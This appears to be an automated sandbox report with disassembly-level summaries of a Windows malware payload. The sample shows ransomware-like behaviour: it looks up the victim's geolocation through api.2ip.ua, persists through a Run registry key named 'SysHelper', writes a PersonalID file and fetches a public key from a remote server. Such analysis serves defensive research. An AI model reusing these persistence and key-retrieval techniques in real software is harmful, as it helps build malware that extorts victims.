                                                                                                        • Instruction ID: f9a4796f941addbb438b1aa219ba7ebd8029142f99b69a3829e51acdf21761fe
                                                                                                        • Opcode Fuzzy Hash: 8de8ebbda8f5b6f0764641484750e9368cf0ad71288220b1c47d128379061dc8
                                                                                                        • Instruction Fuzzy Hash: E842BF71D103259BDF24DFA8DC85BAEBBF1BF04318F144139E805AB281D779AA09DB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1CF10 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 228networkfileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2199 f1cf10-f1cfb0 call f3f7c0 call f3b420 InternetOpenW call f25c10 InternetOpenUrlW 2206 f1cfb2-f1cfb4 2199->2206 2207 f1cfb9-f1cffb InternetReadFile InternetCloseHandle * 2 call f256d0 2199->2207 2208 f1d213-f1d217 2206->2208 2212 f1d000-f1d01d 2207->2212 2210 f1d224-f1d236 2208->2210 2211 f1d219-f1d221 call f32587 2208->2211 2211->2210 2214 f1d023-f1d02c 2212->2214 2215 f1d01f-f1d021 2212->2215 2218 f1d030-f1d035 2214->2218 2217 f1d039-f1d069 call f256d0 call f24300 2215->2217 2224 f1d1cb 2217->2224 2225 f1d06f-f1d08b call f23010 2217->2225 2218->2218 2220 f1d037 2218->2220 2220->2217 2227 f1d1cd-f1d1d1 2224->2227 2231 f1d0b9-f1d0bd 2225->2231 2232 f1d08d-f1d091 2225->2232 2229 f1d1d3-f1d1db call f32587 2227->2229 2230 f1d1de-f1d1f4 2227->2230 2229->2230 2234 f1d201-f1d20f 2230->2234 2235 f1d1f6-f1d1fe call f32587 2230->2235 2240 f1d0cd-f1d0e1 call f24300 2231->2240 2241 f1d0bf-f1d0ca call f32587 2231->2241 2237 f1d093-f1d09b call f32587 2232->2237 2238 f1d09e-f1d0b4 call f23d40 2232->2238 2234->2208 2235->2234 2237->2238 2238->2231 2240->2224 2250 f1d0e7-f1d149 call f23010 2240->2250 2241->2240 2253 f1d150-f1d15a 2250->2253 2254 f1d160-f1d162 2253->2254 2255 f1d15c-f1d15e 2253->2255 2257 f1d165-f1d16a 2254->2257 2256 f1d16e-f1d18b call f1b650 2255->2256 2261 f1d19a-f1d19e 2256->2261 2262 f1d18d-f1d18f 2256->2262 2257->2257 2258 f1d16c 2257->2258 2258->2256 2261->2253 2264 f1d1a0 2261->2264 2262->2261 2263 f1d191-f1d198 2262->2263 2263->2261 2265 f1d1c7-f1d1c9 2263->2265 2266 f1d1a2-f1d1a6 2264->2266 2265->2266 2267 f1d1b3-f1d1c5 2266->2267 2268 f1d1a8-f1d1b0 call f32587 2266->2268 2267->2227 2268->2267
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F1CF4A
                                                                                                        • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00F1CF5F
                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F1CFA6
                                                                                                        • InternetReadFile.WININET(00000000,?,00002800,?), ref: 00F1CFCD
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F1CFDA
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F1CFDD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                        • String ID: $"country_code":"$$$($Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                        • API String ID: 1485416377-933853286
                                                                                                        • Opcode ID: e9d53f1c9b567282708b198eeee01ef827ac985c3d6482d49a4efbf28487d0b6
                                                                                                        • Instruction ID: 4a84508e599a688f1c611de8fb0495b32394ec6f8ddce907f6975f1efce63f1e
                                                                                                        • Opcode Fuzzy Hash: e9d53f1c9b567282708b198eeee01ef827ac985c3d6482d49a4efbf28487d0b6
                                                                                                        • Instruction Fuzzy Hash: 9891D371D00259EBEF25CFA0DC45BEEBBB4AF05304F244158E4457B281D7BA5A88EFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2BAE0 Relevance: 18.3, APIs: 12, Instructions: 320windowCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2271 f2bae0-f2bb0d 2272 f2bb13 2271->2272 2273 f2bba0-f2bba7 2271->2273 2276 f2bb54-f2bb5e 2272->2276 2277 f2bb15-f2bb1a 2272->2277 2274 f2bf3d-f2bf47 2273->2274 2275 f2bbad-f2bbae 2273->2275 2284 f2bf49 2274->2284 2285 f2bf5c-f2bf63 2274->2285 2280 f2bbb0-f2bbd4 DefWindowProcW 2275->2280 2281 f2bbd7-f2bc45 call f30c62 GetComputerNameW call f23100 call f2ce80 2275->2281 2278 f2bf81-f2bf97 2276->2278 2279 f2bb64-f2bb68 2276->2279 2282 f2bb47-f2bb4f PostQuitMessage 2277->2282 2283 f2bb1c-f2bb1f 2277->2283 2286 f2bb75-f2bb9d DefWindowProcW 2279->2286 2287 f2bb6a-f2bb6e 2279->2287 2305 f2bc47-f2bc4c 2281->2305 2306 f2bc7b-f2bc80 2281->2306 2282->2278 2283->2278 2291 f2bb25-f2bb28 2283->2291 2292 f2bf50-f2bf54 2284->2292 2288 f2bf65-f2bf71 IsWindow 2285->2288 2289 f2bf9a-f2bfc2 DefWindowProcW 2285->2289 2287->2279 2294 f2bb70 2287->2294 2288->2278 2295 f2bf73-f2bf7b DestroyWindow 2288->2295 2291->2280 2297 f2bb2e-f2bb31 2291->2297 2292->2289 2293 f2bf56-f2bf5a 2292->2293 2293->2285 2293->2292 2294->2278 2295->2278 2297->2278 2299 f2bb37-f2bb42 call f21cd0 2297->2299 2299->2288 2307 f2bc5a-f2bc76 call f245a0 2305->2307 2308 f2bc4e-f2bc57 call f32587 2305->2308 2309 f2bc82-f2bc8b call f32587 2306->2309 2310 f2bc8e-f2bcb1 2306->2310 2307->2306 2308->2307 2309->2310 2314 f2bcb3-f2bcbc call f32587 2310->2314 2315 f2bcbf-f2bcf1 call f30bed 2310->2315 2314->2315 2322 f2bcf7-f2bcfa 2315->2322 2323 f2befb-f2bf0f IsWindow 2315->2323 2324 f2bd00-f2bd04 2322->2324 2325 f2bf11-f2bf18 2323->2325 2326 f2bf28-f2bf2d 2323->2326 2327 f2bee5-f2bef1 2324->2327 2328 f2bd0a-f2bd0e 2324->2328 2325->2326 2329 f2bf1a-f2bf22 DestroyWindow 2325->2329 2326->2278 2330 f2bf2f-f2bf3b call f32587 2326->2330 2327->2324 2332 f2bef7-f2bef9 2327->2332 2328->2327 2331 f2bd14-f2bd7b call f24690 * 2 call f1eff0 2328->2331 2329->2326 2330->2278 2341 f2bee1 2331->2341 2342 f2bd81-f2be44 call f2c330 call f29d10 call f2c240 call f2b680 call f2b8b0 call f24690 call f2ce80 call f231d0 2331->2342 2332->2323 2332->2326 2341->2327 2359 f2be46-f2be52 call f32587 2342->2359 2360 f2be55-f2be81 2342->2360 2359->2360 2362 f2be83-f2be8c call f32587 2360->2362 2363 f2be8f-f2bedf CreateThread 2360->2363 2362->2363 2363->2327
                                                                                                        APIs
                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00F2BB49
                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00F2BBBA
                                                                                                        • _malloc.LIBCMT ref: 00F2BBE4
                                                                                                        • GetComputerNameW.KERNEL32(00000000,?), ref: 00F2BBF4
                                                                                                        • _free.LIBCMT ref: 00F2BCD7
                                                                                                          • Part of subcall function 00F21CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00FDAC68,000000FF), ref: 00F21D12
                                                                                                          • Part of subcall function 00F21CD0: _memset.LIBCMT ref: 00F21D3B
                                                                                                          • Part of subcall function 00F21CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00F21D63
                                                                                                          • Part of subcall function 00F21CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FDAC68,000000FF), ref: 00F21D6C
                                                                                                          • Part of subcall function 00F21CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00F21DD6
                                                                                                          • Part of subcall function 00F21CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00F21E48
                                                                                                        • IsWindow.USER32(?), ref: 00F2BF69
                                                                                                        • DestroyWindow.USER32(?), ref: 00F2BF7B
                                                                                                        • DefWindowProcW.USER32(?,00008003,?,?), ref: 00F2BFA8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3873257347-0
                                                                                                        • Opcode ID: 379b4cda7c4e68fdc843955d67f4668ca1eeb7d95f1df90ec67500f3f3397b98
                                                                                                        • Instruction ID: a8f0920c281c0871dda94bb2c9981eaa46c4691646094da2b1f99a2ca36b82a9
                                                                                                        • Opcode Fuzzy Hash: 379b4cda7c4e68fdc843955d67f4668ca1eeb7d95f1df90ec67500f3f3397b98
                                                                                                        • Instruction Fuzzy Hash: 11C1C1719083509FDB20DF24EC4575ABBE4FF85324F144A1DF888872A1D77A9908EF92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F33576 Relevance: 15.3, APIs: 10, Instructions: 258COMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2517 f33576-f3358f 2518 f33591-f3359b call f35208 call f342d2 2517->2518 2519 f335a9-f335be call f3b420 2517->2519 2528 f335a0 2518->2528 2519->2518 2524 f335c0-f335c3 2519->2524 2526 f335d7-f335dd 2524->2526 2527 f335c5 2524->2527 2531 f335e9 call f3fb64 2526->2531 2532 f335df 2526->2532 2529 f335c7-f335c9 2527->2529 2530 f335cb-f335d5 call f35208 2527->2530 2533 f335a2-f335a8 2528->2533 2529->2526 2529->2530 2530->2528 2538 f335ee-f335fa call f3f803 2531->2538 2532->2530 2535 f335e1-f335e7 2532->2535 2535->2530 2535->2531 2541 f33600-f3360c call f3f82d 2538->2541 2542 f337e5-f337ef call f342fd 2538->2542 2541->2542 2547 f33612-f3361e call f3f857 2541->2547 2547->2542 2550 f33624-f3362b 2547->2550 2551 f3369b-f336a6 call f3f939 2550->2551 2552 f3362d 2550->2552 2551->2533 2558 f336ac-f336af 2551->2558 2554 f33637-f33653 call f3f939 2552->2554 2555 f3362f-f33635 2552->2555 2554->2533 2562 f33659-f3365c 2554->2562 2555->2551 2555->2554 2560 f336b1-f336ba call f3fbb4 2558->2560 2561 f336de-f336eb 2558->2561 2560->2561 2570 f336bc-f336dc 2560->2570 2564 f336ed-f336fc call f405a0 2561->2564 2565 f33662-f3366b call f3fbb4 2562->2565 2566 f3379e-f337a0 2562->2566 2573 f33709-f33730 call f404f0 call f405a0 2564->2573 2574 f336fe-f33706 2564->2574 2565->2566 2575 f33671-f33689 call f3f939 2565->2575 2566->2533 2570->2564 2583 f33732-f3373b 2573->2583 2584 f3373e-f33765 call f404f0 call f405a0 2573->2584 2574->2573 2575->2533 2580 f3368f-f33696 2575->2580 2580->2566 2583->2584 2589 f33773-f33782 call f404f0 2584->2589 2590 f33767-f33770 2584->2590 2593 f33784 2589->2593 2594 f337af-f337c8 2589->2594 2590->2589 2595 f33786-f33788 2593->2595 2596 f3378a-f33798 2593->2596 2597 f3379b 2594->2597 2598 f337ca-f337e3 2594->2598 2595->2596 2599 f337a5-f337a7 2595->2599 2596->2597 2597->2566 2598->2566 2599->2566 2600 f337a9 2599->2600 2600->2594 2601 f337ab-f337ad 2600->2601 2601->2566 2601->2594
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F335B1
                                                                                                          • Part of subcall function 00F35208: __getptd_noexit.LIBCMT ref: 00F35208
                                                                                                        • __gmtime64_s.LIBCMT ref: 00F3364A
                                                                                                        • __gmtime64_s.LIBCMT ref: 00F33680
                                                                                                        • __gmtime64_s.LIBCMT ref: 00F3369D
                                                                                                        • __allrem.LIBCMT ref: 00F336F3
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F3370F
                                                                                                        • __allrem.LIBCMT ref: 00F33726
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F33744
                                                                                                        • __allrem.LIBCMT ref: 00F3375B
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F33779
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1503770280-0
                                                                                                        • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                        • Instruction ID: afc7a2d26dacf512abb0345b35291f1611faeb933c5fe893d01d8073f8501876
                                                                                                        • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                        • Instruction Fuzzy Hash: 9B7197F2E00717ABD714DE79CC42B5AB7A8AF44374F14423AF914D7681E774EA40AB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F30FDD: __wfsopen.LIBCMT ref: 00F30FE8
                                                                                                        • _fgetws.LIBCMT ref: 00F1C7BC
                                                                                                        • _memmove.LIBCMT ref: 00F1C89F
                                                                                                        • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 00F1C94B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                        • API String ID: 2864494435-54166481
                                                                                                        • Opcode ID: 6fd5d663f952dd38020e5325937d23158db90a70dc86b8aa14b2dc20f0f46388
                                                                                                        • Instruction ID: 80bfc551ae72081752f6e4119e2ae9157c68cfd90c6f2fce0caf7e9b0a2dc098
                                                                                                        • Opcode Fuzzy Hash: 6fd5d663f952dd38020e5325937d23158db90a70dc86b8aa14b2dc20f0f46388
                                                                                                        • Instruction Fuzzy Hash: E091E272D403199BDF21DFA4CC817EEB7B4AF04324F140529E805A3241E779AE84EBE1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,75B04E90), ref: 00F1F338
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00F1F353
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                        • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                        • API String ID: 2574300362-2555811374
                                                                                                        • Opcode ID: 782c5e838f522e6b7c3ca82b023067afee5222d2c51a078251a27884580513ee
                                                                                                        • Instruction ID: 0636d4fdd06ca84606823be8b7111837fd1533d08c5ea2b1429f231e77a3ea0f
                                                                                                        • Opcode Fuzzy Hash: 782c5e838f522e6b7c3ca82b023067afee5222d2c51a078251a27884580513ee
                                                                                                        • Instruction Fuzzy Hash: 15C15971D01219EBDF00DFA4DD8ABDEBBB5BF14308F144029E405AB250EB79AA58DB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,00F2E6D4), ref: 00F1C6C2
                                                                                                        • RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 00F1C6F3
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F1C700
                                                                                                        • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 00F1C725
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F1C72E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseValue$OpenQuery
                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                        • API String ID: 3962714758-1667468722
                                                                                                        • Opcode ID: 4b268eac27cdd5d602594fd408053afcbc2e1d4e50d0f336b562597725bd9120
                                                                                                        • Instruction ID: d87d5d49a9da14bb2993553681f5605227cca6f23c9a71a4bd88e756ac0bae4d
                                                                                                        • Opcode Fuzzy Hash: 4b268eac27cdd5d602594fd408053afcbc2e1d4e50d0f336b562597725bd9120
                                                                                                        • Instruction Fuzzy Hash: 80111B7594030DFBEF219FA0CC4ABEEBB79EB04B18F104195EA00F6191D7B15A54FA90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2E6E8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F2E707
                                                                                                          • Part of subcall function 00F1C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00F1C51B
                                                                                                        • InternetOpenW.WININET ref: 00F2E743
                                                                                                        • _wcsstr.LIBCMT ref: 00F2E7AE
                                                                                                        • _memmove.LIBCMT ref: 00F2E838
                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00F2E90A
                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 00F2E93D
                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F2E954
                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00F2E96F
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2E98C
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2E9A3
                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00F2E9CD
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F2E9F3
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F2E9F6
                                                                                                        • _strstr.LIBCMT ref: 00F2EA36
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2EA59
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2EA74
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F2EA82
                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00F2EA92
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EAA4
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EABA
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2EAC8
                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00F2EAE3
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EB5B
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2EB7C
                                                                                                        • _malloc.LIBCMT ref: 00F2EB86
                                                                                                        • _memset.LIBCMT ref: 00F2EB94
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00F2EBAE
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EBB6
                                                                                                        • _strstr.LIBCMT ref: 00F2EBDA
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2EC00
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2EC24
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F2EC32
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
